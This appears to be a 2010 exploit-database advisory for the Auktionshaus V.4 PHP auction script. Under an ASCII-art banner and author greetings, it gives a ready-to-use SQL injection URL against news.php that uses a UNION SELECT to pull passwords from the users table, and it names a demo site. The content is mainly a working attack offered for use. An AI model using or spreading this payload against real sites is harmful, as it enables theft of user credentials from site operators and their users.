Auktionshaus version 4 suffers from a remote SQL injection vulnerability.
cbe64a89f21685a06e52c0194e489ce4f79884727f91f02be20a1b0009976c8e
# Exploit Title: Auktionshaus V.4 SQL Injection news.php
# Date: 17.02.2010
# Author: Easy Laster
# Tested on: windows xp
########################################################################
##Auktionshaus V.4 SQL Injection news.php ##
########################################################################
########################################################################
## _ _ _ _ ##
##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_ ##
##| _| -_| .'| |___| | | _| -_| _| | -_| _| ##
##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ##
## ##
########################################################################
##########################################################################
#Script: Auktionshaus V.4] #
#Vulnerabilities [ SQL Injection ] #
#Language: [ PHP ] #
#Download: [ buy this script ] #
#Founder: [ ea$y laster ] #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ] #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] # #
#Price: [ Commercial License EUR 89,99 #
#DEMO : https://demo3.dolorez.de/ #
############################################################################
#https://[demo].de/news.php?id=-1+union+select+1,2,password,4,5+from+users--# #
############################################################################